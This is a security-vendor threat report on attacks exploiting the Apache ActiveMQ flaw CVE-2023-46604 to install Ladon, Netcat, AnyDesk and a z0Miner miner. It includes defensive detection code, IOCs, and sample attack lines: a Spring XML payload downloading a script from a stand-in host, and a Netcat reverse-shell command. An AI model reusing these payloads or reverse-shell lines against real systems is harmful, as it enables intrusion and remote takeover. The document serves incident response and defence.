Apache ActiveMQ Vulnerability (CVE-2023-46604) Continuously Being Exploited in Attacks – ASEC BLOG

In November 2023, AhnLab Security Emergency response Center (ASEC) published a blog post titled “Circumstances of the Andariel Group Exploiting an Apache ActiveMQ Vulnerability (CVE-2023-46604)” [1], which covered cases of the Andariel threat group exploiting CVE-2023-46604 to install malware. That post covered not only the Andariel group’s attacks but also cases in which HelloKitty ransomware, Cobalt Strike, and Metasploit Meterpreter were installed through the same vulnerability.

Since then, CVE-2023-46604 has continued to be exploited by various threat actors. This post covers recently identified follow-on attacks that installed Ladon, Netcat, AnyDesk, and z0Miner.

1. Apache ActiveMQ Vulnerability (CVE-2023-46604) Attacks

CVE-2023-46604 is a remote code execution vulnerability in Apache ActiveMQ, an open-source message broker and integration pattern server. If an unpatched Apache ActiveMQ instance exposes its OpenWire port (61616/TCP by default) to the outside, a remote attacker can execute arbitrary commands without authentication and take over the system.

  • AhnLab TIP: Apache ActiveMQ Security Update Advisory (CVE-2023-46604) [2] (Korean only at the time of writing.)

The exploit abuses the way the OpenWire protocol unmarshals a serialized class type: the server instantiates whatever class name the packet supplies, as long as that class is on the classpath, and hands it the string field from the same packet. When the threat actor sends a crafted packet, the vulnerable server treats that string as a path (URL), fetches the XML configuration file it points to, and instantiates the class from it.

For example, the Java process of a vulnerable Apache ActiveMQ server, given the crafted packet, loads an XML configuration file from “hxxp://27.191.193[.]193:555/poc2.xml”. The commands designated in that XML file are then executed. In the following case, the XML is configured to run CMD and PowerShell to download Ladon and then execute a reverse shell command.

Figure 1. A configuration file containing a command to install Ladon and execute a reverse shell
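The two artifacts an incident responder ends up holding are the crafted OpenWire packet (from a capture) and the XML file it points at. The following Python is an added example, not code from the ASEC post: it flags the packet by the class name it carries and recovers the command a fetched XML file would run. The class names are those used by the public proof of concept for this CVE (Spring’s XmlApplicationContext classes, which load a bean definition from a URL), and the packet bytes, the XML, and the 192.0.2.10 address are constructed for the example.

```python
"""Triage helpers for CVE-2023-46604 artifacts: spot the crafted OpenWire
packet in a capture and recover the command a fetched XML file would run.

Added example, not code from the ASEC post. The class names are those of
the public proof of concept for this CVE (Spring's XmlApplicationContext
classes, which load a bean definition from a URL); the packet bytes and
the XML below are constructed for the example.
"""
import re
import xml.etree.ElementTree as ET

SPRING_NS = "http://www.springframework.org/schema/beans"

# Classes a crafted ExceptionResponse names so the broker fetches and
# evaluates a remote Spring XML file. Legitimate traffic never carries them.
SUSPICIOUS_CLASSES = (
    b"org.springframework.context.support.ClassPathXmlApplicationContext",
    b"org.springframework.context.support.FileSystemXmlApplicationContext",
)
URL_RE = re.compile(rb"https?://[\x21-\x7e]+?\.xml", re.IGNORECASE)


def find_exploit_indicator(payload: bytes):
    """Return (class_name, xml_url) if the raw TCP payload carries one of the
    suspicious class names, else None. xml_url is None when no URL follows
    the class name (still worth alerting on)."""
    for cls in SUSPICIOUS_CLASSES:
        idx = payload.find(cls)
        if idx == -1:
            continue
        m = URL_RE.search(payload, idx + len(cls))
        return cls.decode(), (m.group(0).decode() if m else None)
    return None


def extract_commands(xml_text: str) -> list:
    """Return the argv list of every java.lang.ProcessBuilder bean in a
    Spring bean-definition file, i.e. what the broker will execute."""
    root = ET.fromstring(xml_text)
    cmds = []
    for bean in root.iter(f"{{{SPRING_NS}}}bean"):
        if bean.get("class") != "java.lang.ProcessBuilder":
            continue
        argv = [v.text or "" for v in
                bean.findall("b:constructor-arg/b:list/b:value", {"b": SPRING_NS})]
        if argv:
            cmds.append(argv)
    return cmds


# Constructed sample: the strings of interest with OpenWire-style 2-byte
# length prefixes; a real packet has more framing around them.
SAMPLE_PAYLOAD = (
    b"\x00\x00\x00\x60\x1f\x00\x00\x00\x00\x00\x00\x00\x00\x01\x01"
    b"\x00\x42org.springframework.context.support.ClassPathXmlApplicationContext"
    b"\x01\x00\x1ehttp://192.0.2.10:555/poc2.xml"
)

# Constructed sample in the layout of the public PoC XML; 192.0.2.10 is a
# documentation address standing in for the attacker host.
SAMPLE_XML = """<beans xmlns="http://www.springframework.org/schema/beans">
  <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
    <constructor-arg>
      <list>
        <value>cmd</value>
        <value>/c</value>
        <value>powershell -c "iwr http://192.0.2.10:555/Ladon.ps1 -OutFile C:\\Windows\\Temp\\Ladon.ps1"</value>
      </list>
    </constructor-arg>
  </bean>
</beans>
"""

if __name__ == "__main__":
    print(find_exploit_indicator(SAMPLE_PAYLOAD))
    for argv in extract_commands(SAMPLE_XML):
        print(argv)
```

The packet check deliberately searches the raw payload rather than parsing OpenWire framing, so it works on a pcap slice or an IDS content match alike; the XML parser is what you run on the file retrieved from the URL, since the argv list is exactly what the broker’s JVM passed to ProcessBuilder.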

2. Ladon

As the GitHub page below shows, Ladon is one of the tools mainly used by Chinese-speaking threat actors. [3] It offers a range of features needed during an intrusion, chief among them scanning, privilege escalation, credential theft, and reverse shells.

Figure 2. Ladon’s GitHub page

The author continues to update Ladon, and the tool also offers a scanner for the relatively recent CVE-2023-46604 vulnerability.

Figure 3. Ladon’s scanning feature for the CVE-2023-46604 vulnerability

While it cannot be determined whether the threat actor used Ladon to scan for the vulnerability, after confirming that a vulnerable version of Apache ActiveMQ was in use they ran the following PowerShell command to download Ladon and execute additional commands. Ladon’s ReverseTCP command launches a reverse shell, and Netcat (nc) was used to establish it.

Figure 4. Reverse shell being executed through a vulnerability attack

3. AnyDesk & Netcat

Netcat, already seen above as the reverse shell behind Ladon’s ReverseTCP command, also appears on its own in other cases. Netcat is a utility for sending and receiving data over TCP/UDP connections and is available for Windows as well as Linux. Because it offers many features useful for network testing it is commonly used by network administrators, but the same features make it a convenient tool for threat actors.

Depending on the arguments given when it is launched, Netcat can act as a reverse shell or a bind shell, and there have been actual cases where it was used in attacks against vulnerable web servers and MS-SQL servers. [4] [5] In the recently identified attack, Netcat was downloaded from an external host and then run with a reverse shell command to obtain a shell on the infected system.

Figure 5. Netcat being installed and executed through a vulnerability attack

Although a reverse shell gives control of the infected system, a command-line interface is limiting. Threat actors therefore commonly install VNC, RDP, or another remote administration tool after the initial compromise so that they can control the system’s screen. In particular, remote administration tools such as AnyDesk, NetSupport, and Chrome Remote Desktop have recently been used because they are less likely to be blocked by security products. [6]

In the recently identified attack, the threat actor installed AnyDesk after Netcat. The Netcat session established above was used to install AnyDesk, and the setup file was downloaded from the official AnyDesk website’s download URL.

Figure 6. Installing AnyDesk using Netcat

After installing AnyDesk in silent mode, the threat actor set the access password with the “--set-password” argument and then launched the program.

Figure 7. AnyDesk launched with the configured password

This routine is almost identical to the one identified in a past attack case against MS-SQL servers.

Figure 8. The PowerShell routine to install AnyDesk identified in a past attack case

The threat actor would then have connected to the infected system using the password supplied through the “--set-password” argument and controlled it remotely.

Figure 9. Logging in to the remote system where AnyDesk is installed
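The chain in sections 2 and 3 (the broker’s java.exe spawning a shell, Ladon’s ReverseTCP, a Netcat reverse shell, then an unattended AnyDesk install followed by --set-password) leaves a recognisable sequence in process-creation telemetry. The following Python is an added example, not from the ASEC post: detection rules run over constructed events shaped like a process-creation log (parent image, image, command line, as in Sysmon Event ID 1). The post quotes only the --set-password argument; the --install and --silent switches are AnyDesk’s unattended-install options and are an assumption of this example, as are the 192.0.2.x addresses standing in for the attacker hosts.

```python
"""Process-creation detection for the post-exploitation chain described
above: ActiveMQ's java.exe spawning a shell, Ladon's ReverseTCP, a Netcat
reverse shell, and an unattended AnyDesk install followed by --set-password.
Added example, not from ASEC. Events are constructed in the shape of a
process-creation log (parent image, image, command line), e.g. Sysmon EID 1.
"""
import re

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
NETCAT_IMAGES = {"nc.exe", "nc64.exe", "ncat.exe", "netcat.exe"}
# "host port" on the command line: a connect-out target rather than a listener
IP_PORT_RE = re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}\s+\d{1,5}\b")
# -e / -c (possibly bundled, e.g. -ve) attach a program to the socket
NC_EXEC_RE = re.compile(r"(?:^|\s)-[a-z]*[ec](?:\s|$)")


def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(event: dict) -> list:
    """Return the names of every rule the event matches ([] if none)."""
    hits = []
    parent = basename(event.get("parent_image", ""))
    image = basename(event.get("image", ""))
    cmd = event.get("command_line", "")
    lcmd = cmd.lower()

    # 1. The broker JVM has no reason to start an interactive shell; the
    #    CVE-2023-46604 payload runs cmd/powershell as a child of java.exe.
    if parent == "java.exe" and image in SHELLS:
        hits.append("activemq_java_spawns_shell")

    # 2. Ladon's ReverseTCP command invoked from a shell.
    if image in SHELLS and "ladon" in lcmd and "reversetcp" in lcmd:
        hits.append("ladon_reversetcp")

    # 3. Netcat with an exec flag or a connect-out target.
    if image in NETCAT_IMAGES and (NC_EXEC_RE.search(lcmd) or IP_PORT_RE.search(cmd)):
        hits.append("netcat_reverse_shell")

    # 4. AnyDesk deployed unattended. The post quotes only --set-password;
    #    --install/--silent are AnyDesk's unattended-install switches
    #    (assumed here, not taken from the post).
    if image.startswith("anydesk"):
        if "--set-password" in lcmd:
            hits.append("anydesk_set_password")
        if "--install" in lcmd or "--silent" in lcmd:
            hits.append("anydesk_silent_install")
    return hits


def scan(events) -> list:
    """Return [(index, [rules...]), ...] for the events that match any rule."""
    return [(i, h) for i, e in enumerate(events) if (h := classify(e))]


# Constructed sample events; 192.0.2.0/24 is a documentation range standing
# in for the attacker hosts in the post's IOC list.
SAMPLE_EVENTS = [
    {"parent_image": r"C:\activemq\jre\bin\java.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"cmd /c powershell -ep bypass -f C:\Windows\Temp\Ladon.ps1"},
    {"parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r'powershell -c "Import-Module C:\Windows\Temp\Ladon.ps1; Ladon ReverseTCP 192.0.2.10 50000"'},
    {"parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\Temp\ncat.exe",
     "command_line": "ncat.exe 192.0.2.20 6666 -e cmd.exe"},
    {"parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\Temp\AnyDesk.exe",
     "command_line": r'AnyDesk.exe --install "C:\Program Files (x86)\AnyDesk" --silent'},
    {"parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Program Files (x86)\AnyDesk\AnyDesk.exe",
     "command_line": "AnyDesk.exe --set-password"},
    {"parent_image": r"C:\Windows\explorer.exe",          # benign control
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": "cmd.exe /c dir"},
]

if __name__ == "__main__":
    for i, rules in scan(SAMPLE_EVENTS):
        print(i, rules)
```

Rule 1 is the one worth deploying on its own: on a broker host, java.exe spawning cmd.exe or powershell.exe is close to a zero-false-positive signal, whereas AnyDesk and Netcat rules need allow-listing where administrators legitimately use them.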

4. z0Miner

Recently, there have also been attack campaigns that installed the XMRig CoinMiner. The XML configuration file is named “paste.xml” and contains data that uses CMD to execute the PowerShell command shown below. Note that “shella” is presumed to be a copy of the PowerShell executable, which the threat actor appears to have copied under this name in an earlier phase of the attack. The decrypted PowerShell command downloads and executes another PowerShell script.

Figure 10. The configuration file containing an encrypted PowerShell command

The downloaded PowerShell script is simple: it downloads and executes XMRig CoinMiner together with its configuration file.

Figure 11. The PowerShell script that installs XMRig CoinMiner
Figure 12. The mining pool and wallet address in the configuration file

Analysis of the PowerShell script used in the attack showed that its variable names, function names, and overall structure resemble those of z0Miner. z0Miner was first reported in 2020 by the Tencent Security Team and was distributed through attacks exploiting the Oracle WebLogic remote code execution vulnerabilities (CVE-2020-14882/CVE-2020-14883). In 2021, z0Miner was distributed through the Atlassian Confluence remote code execution vulnerability (CVE-2021-26084). [7] [8] That case was also covered in a past ASEC blog post. [9]
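The config.json shown in Figure 12 is where the pool and wallet live, and those two values are the IOCs worth recording from a miner infection. The following Python is an added example, not from the ASEC post: it pulls the pool URL and wallet out of an XMRig configuration and sanity-checks the wallet’s shape. The configs are constructed, using a placeholder wallet with the right length and prefix rather than the address from the figure, and the pool hostname is a placeholder.

```python
"""Pull the mining pool and wallet out of an XMRig config.json so they can be
recorded as IOCs. Added example, not from ASEC: the configs below are
constructed, with a placeholder wallet of the right shape instead of the
address shown in Figure 12."""
import json
import re

# Monero addresses: 95 base58 characters starting with 4 (8 for a
# subaddress), or a 106-character integrated address starting with 4.
B58 = r"[1-9A-HJ-NP-Za-km-z]"
XMR_ADDR_RE = re.compile(rf"^(?:[48]{B58}{{94}}|4{B58}{{105}})$")


def extract_pools(config_text: str) -> list:
    """Return one dict per pool: pool URL, wallet, worker suffix and whether
    the wallet parses as a Monero address.

    Both XMRig layouts are handled: the current "pools": [...] list and the
    old single-pool layout with url/user/pass at the top level."""
    cfg = json.loads(config_text)
    pools = cfg.get("pools")
    if not isinstance(pools, list):
        pools = [cfg]
    found = []
    for pool in pools:
        if not isinstance(pool, dict) or not pool.get("url"):
            continue
        user = str(pool.get("user") or "")
        # Many pools accept "WALLET.worker"; keep both halves separately.
        wallet, _, worker = user.partition(".")
        found.append({
            "pool": pool["url"],
            "wallet": wallet,
            "worker": worker,
            "wallet_looks_valid": bool(XMR_ADDR_RE.match(wallet)),
        })
    return found


# Constructed samples. PLACEHOLDER_WALLET only has the right length/prefix.
PLACEHOLDER_WALLET = "4" + "A" * 94
SAMPLE_CONFIG = json.dumps({
    "autosave": True,
    "cpu": True,
    "pools": [{"url": "pool.example:3333", "user": PLACEHOLDER_WALLET + ".rig1",
               "pass": "x", "keepalive": True, "tls": False}],
})
OLD_STYLE_CONFIG = json.dumps({"url": "pool.example:5555", "user": "notawallet", "pass": "x"})

if __name__ == "__main__":
    for entry in extract_pools(SAMPLE_CONFIG) + extract_pools(OLD_STYLE_CONFIG):
        print(entry)
```

A wallet that fails the shape check is not a reason to discard the sample: proxy-style miners and some pools use a login name instead of an address, which is why the raw user string is still split and returned.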

5. Conclusion

Threat actors continue to attack unpatched, vulnerable Apache ActiveMQ services. Among the identified attacks, some installed CoinMiners to mine cryptocurrency, and many installed malware used to control the infected system. Once a system is compromised, threat actors can steal data or deploy ransomware.

System administrators should check whether their Apache ActiveMQ service is one of the vulnerable versions below and apply the latest patches to prevent attacks exploiting known vulnerabilities. The vulnerability is fixed in Apache ActiveMQ 5.15.16, 5.16.7, 5.17.6, and 5.18.3.

Apache ActiveMQ versions 5.18.0 – 5.18.2
Apache ActiveMQ versions 5.17.0 – 5.17.5
Apache ActiveMQ versions 5.16.0 – 5.16.6
Apache ActiveMQ versions 5.15.15 or earlier
Apache ActiveMQ Legacy OpenWire Module versions 5.18.0 – 5.18.2
Apache ActiveMQ Legacy OpenWire Module versions 5.17.0 – 5.17.5
Apache ActiveMQ Legacy OpenWire Module versions 5.16.0 – 5.16.6
Apache ActiveMQ Legacy OpenWire Module versions 5.8.0 – 5.15.15
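The ranges above are easy to misread by hand (the broker list has no lower bound while the legacy OpenWire module starts at 5.8.0). The following Python is an added example, not from the ASEC post: it encodes the ranges exactly as listed and reports the smallest patched release on the same branch. The fixed releases it suggests (5.15.16, 5.16.7, 5.17.6, 5.18.3) are the ones named in the Apache advisory; pointing branches older than 5.15 at 5.15.16 is this example’s choice.

```python
"""Check an Apache ActiveMQ version string against the vulnerable ranges
listed above. Added example, not from ASEC. The fixed releases in FIXED
(5.15.16, 5.16.7, 5.17.6, 5.18.3) are those named in the Apache advisory."""


def parse_version(s: str) -> tuple:
    """'5.17.5' -> (5, 17, 5). A qualifier such as '-SNAPSHOT' is dropped and
    short strings are padded ('5.18' -> (5, 18, 0)) so tuples compare cleanly."""
    parts = [int(p) for p in s.strip().split("-")[0].split(".")]
    while len(parts) < 3:
        parts.append(0)
    return tuple(parts[:3])


# Inclusive (first, last) vulnerable versions, transcribed from the list above.
BROKER_RANGES = [
    ((5, 18, 0), (5, 18, 2)),
    ((5, 17, 0), (5, 17, 5)),
    ((5, 16, 0), (5, 16, 6)),
    ((0, 0, 0), (5, 15, 15)),   # "5.15.15 or earlier"
]
# The Legacy OpenWire Module list starts at 5.8.0 instead of "or earlier".
LEGACY_OPENWIRE_RANGES = BROKER_RANGES[:3] + [((5, 8, 0), (5, 15, 15))]
FIXED = {(5, 15): (5, 15, 16), (5, 16): (5, 16, 7), (5, 17): (5, 17, 6), (5, 18): (5, 18, 3)}


def is_vulnerable(version: str, legacy_openwire: bool = False) -> bool:
    """True if the version falls in a vulnerable range for the broker, or for
    the Legacy OpenWire Module when legacy_openwire=True."""
    v = parse_version(version)
    ranges = LEGACY_OPENWIRE_RANGES if legacy_openwire else BROKER_RANGES
    return any(lo <= v <= hi for lo, hi in ranges)


def minimum_fixed_version(version: str):
    """Smallest patched release on the same 5.x branch, or None if the version
    is not vulnerable. Branches older than 5.15 have no patch of their own, so
    the oldest patched branch (5.15.16) is suggested; that is this example's
    choice, not advisory text."""
    if not is_vulnerable(version):
        return None
    v = parse_version(version)
    return ".".join(map(str, FIXED.get(v[:2], (5, 15, 16))))


if __name__ == "__main__":
    for ver in ("5.18.2", "5.18.3", "5.15.15", "5.7.0", "5.17.5-SNAPSHOT"):
        print(ver, is_vulnerable(ver), minimum_fixed_version(ver))
```

The version string to feed in is the one reported by the broker itself (the activemq.log banner or the web console), not the package name, since distributions sometimes lag the upstream numbering.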

They should also use security programs such as firewalls to restrict attackers’ access to servers reachable from the outside. Finally, AhnLab V3 should be kept updated to the latest version to block malware infections in advance.

File Detection
– Exploit/PS.Ladon (2023.12.09.00)
– Downloader/XML.Generic (2023.12.13.00)
– HackTool/Win.Netcat.R5561954 (2023.12.12.03)
– Downloader/XML.Generic (2023.12.13.00)
– CoinMiner/PS.Agent (2023.12.13.03)
– Win-Trojan/Miner3.Exp (2020.01.23.00)
– CoinMiner/Text.Config (2023.12.13.03)

Behavior Detection
– Execution/MDP.Powershell.M2514
– Execution/MDP.AnyDesk.M4547

IOC
MD5

– eb0e70ea44e578201df1e3c49e905144 : Ladon (Ladon.ps1)
– 1a7e8e719e29c2cca5083053bb240dbc : XML (poc2.xml)
– b6e0db27c2b3e62db616b0918a5d8ed8 : Netcat (ncat.exe)
– c1aa596dc33f2ba4aadbd689a1652701 : XML (paste.xml)
– baeee25ebf0efeec414dce64b9e7aca7 : Downloader (paste.ps1)
– 2a0d26b8b02bb2d17994d2a9a38d61db : XMRig (s.rar)
– da12148890bc665a8a27bf695955d8b0 : XMRig Config (config.json)

C&C
– 27.191.193[.]193:50000 : Ladon Netcat
– 62.233.50[.]97:6666 : Netcat

Download
– hxxp://27.191.193[.]193:555/Ladon.ps1 : Ladon
– hxxp://27.191.193[.]193:555/poc2.xml : XML
– hxxp://62.233.50[.]101:11197/ncat.exe : Netcat
– hxxp://121.190.90[.]250:8081/js/3/paste.xml : XML
– hxxp://121.190.90[.]250:8081/js/3/paste.ps1 : Downloader
– hxxp://121.190.90[.]250:8081/js/s.rar : XMRig
– hxxp://121.190.90[.]250:8081/js/3/config.json : XMRig Config


Source: https://asec.ahnlab.com/en/59904/